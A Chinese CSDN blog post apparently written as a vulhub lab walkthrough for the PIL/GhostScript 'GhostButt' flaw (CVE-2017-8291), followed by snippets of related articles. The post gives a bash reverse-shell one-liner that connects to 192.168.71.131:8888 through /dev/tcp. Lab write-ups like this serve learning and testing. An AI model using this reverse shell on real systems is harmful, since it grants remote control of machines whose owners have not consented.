PIL-CVE-2017-8291

最新推荐文章于 2024-08-02 20:42:33 发布
最新推荐文章于 2024-08-02 20:42:33 发布
阅读量1k 收藏
点赞数 2
分类专栏: vulhub 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48703517/article/details/124613618
版权
本文详细介绍了如何在Docker容器内部执行命令,通过上传并执行poc.png来反弹shell到192.168.71.131的8888端口。同时,Kali系统成功建立了监听,展示了渗透测试中的典型操作流程。
摘要由CSDN通过智能技术生成

打开靶场

192.168.71.141:8000打开

 

讲poc.png上传

以 docker exec –it 7dd /bin/bash

进入容器在tmp下找到poc.png

反弹shell

bash –c  “bash –i >& /dev/tcp/192.168.71.131/8888 0>&1”

Kali启动监听

成功

兔酱君
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PIL-1.1.7.win32-py2.7
03-06
标题"PIL-1.1.7.win32-py2.7"指的是Python Imaging Library (PIL)的一个特定版本——1.1.7,适用于Windows操作系统,并且是为Python 2.7编译的。PIL是Python的一个扩展库,主要用于处理图像,包括打开、操作和保存...
python安装32位的 PIL-1.1.7.win32-py2.7.exe
03-28
标题中的"PIL-1.1.7.win32-py2.7.exe"是指Python Imaging Library(PIL)的一个特定版本,适用于32位Windows操作系统,并且与Python 2.7版本兼容。PIL是Python中用于图像处理的库,提供了丰富的图像处理功能,包括...
Python PIL远程命令执行漏洞复现(CVE-2017-8291 CVE-2017-8291)
didiplus
08-03 2590
漏洞原理 Python中处理图片的模块PILPillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。 漏洞详情 漏洞简述 PIL内部根据图片头(Magic Bytes)判断图片类型,如果发现是一个eps文件(头为%!PS),则分发给PIL/EpsImagePlugin.py处理。 在这个模块中,PIL调用了系统的gs命令,也就是GhostScript来处理图片文件: command = ["gs",
Python-PIL-远程命令执行(GhostButt-)(CVE-2017-8291
bqnagus
10-02 706
Python-PIL-远程命令执行(GhostButt-)(CVE-2017-8291
Python PIL 远程命令执行漏洞(GhostButt CVE-2017-8291
qq_54713392的博客
05-14 900
Python PIL 远程命令执行漏洞(GhostButt CVE-2017-8291 ) 漏洞原理:Python中处理图片的模块PILPillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞 攻击机:window 10 192.168.32.1 靶机:ubantu 16.04 192.168.32.142 (1)在ubantu中开启docker环境CVE-2017-8291 执行命令:docker-compose up
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1048
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
入侵防御漏洞复现(四)
szdx1043的博客
01-22 961
ISC BIND是美国Internet Systems Consortium(ISC)公司所维护的一套实现了DNS协议的开源软件。ISC BIND 9.9.7-P1及之前版本和9.10.2-P2及之前版本的named中存在安全漏洞。远程攻击者可借助TKEY查询利用该漏洞造成拒绝服务(REQUIRE断言失败和守护进程退出)。
PIL-1.1.7.tar
11-17
1. **解压**:使用`tar`命令进行解压缩,`tar -zxf PIL-1.1.7.tar`这行命令会将压缩文件解压到当前目录下,生成一个名为"PIL-1.1.7"的文件夹。 2. **进入目录**:通过`cd PIL-1.1.7`命令,进入解压后的文件夹,这里...
pil-handbook.pdf
04-05
pil-handbook.pdf 学习python图像处理的入门手册,英文不难
Python PIL远程命令执行漏洞(GhostButt)
qq_41048303的博客
12-21 1076
1.原理 Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。PIL内部根据图片头来判断图片类型,如果发现是一个eps文件,则分发给PIL/EpsImagePlugin.py处理。如果操作系统上安装了GhostScript就会因为它的一个沙盒绕过漏洞,导致任意命令执行。 2.漏洞环境 docker-compose up -d 运行后,访问http://192.168.184.130
vulhub漏洞复现55_python
weixin_44193247的博客
02-11 718
vulhub漏洞复现练习篇
APT组织Lazarus近期攻击变化阐述
blackorbird的博客
07-08 600
Lazarus是来自朝鲜的APT组织,该组织长期对韩国、美国进行渗透攻击,此外还对全球的金融机构进行攻击,堪称全球金融机构的最大威胁。下面为近半年该组织的一些最新动态以及...
Vsftpd后门
qq_54713392的博客
05-09 675
Vsftpd后门 打开msf,使用search查找vsftpd模块,使用use调用该模块 连接metasploitable的ip地址,使用set rhost IP地址 使用run执行,生成shell
linux磁盘可视化分析工具
最新发布
吻等离子的博客
08-02 1091
Baobab 是 GNOME 桌面环境中的一款图形化磁盘使用分析工具。它能够扫描文件系统并显示各个文件和目录的磁盘使用情况,以易于理解的树形图或圆环图展示。这种可视化方式使得用户能够快速找到占用空间较大的文件和目录。Baobab 是一款非常实用的磁盘使用可视化工具,特别适合用来分析和管理 Linux 系统中的磁盘空间。通过它的直观界面和强大的功能,用户可以轻松找到占用磁盘空间最多的文件和目录,从而采取相应的措施进行清理或优化。
LeetCode 572.另一棵树的子树 C写法
m0_63816268的博客
08-02 249
可以用上的方法,,如果有一轮比较成功就表示root包含subroot。
linux查询占用端口 杀死占用端口进程
ll回家了
08-02 302
在确定了占用端口的进程之后,您可以使用 `kill` 或 `pkill` 命令来终止这些进程。`lsof`(列出打开的文件)命令是另一个强大的工具,用于检查哪些进程在使用特定端口。您可以使用 `netstat` 和 `lsof` 命令来检查哪些进程在使用特定端口。- **`-n`**:以数字形式显示地址,避免DNS查找。- **`-p`**:显示进程的PID和程序名称。- `kill -9 `:强制终止进程。- **`-t`**:显示TCP端口。- **`-l`**:列出监听端口。
Linux地址空间详解
m0_74830524的博客
08-02 848
本篇通过对物理内存和页表详细的讲解,对 Linux 系统下的地址空间做了深度的剖析。
CanFestival在Linux下的使用
爱就是是恒久忍耐的专栏
08-02 772
Linux下使用CanFestival
subsys-pil-tz
12-29
subsys-pil-tz是一种用于调试和测试的软件。它是一个处理器专用的实时操作系统。它提供了一种可重用的架构,可以在各种嵌入式系统平台上部署。subsys-pil-tz可以加速软件开发过程,提高软件质量,并帮助开发人员更快...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值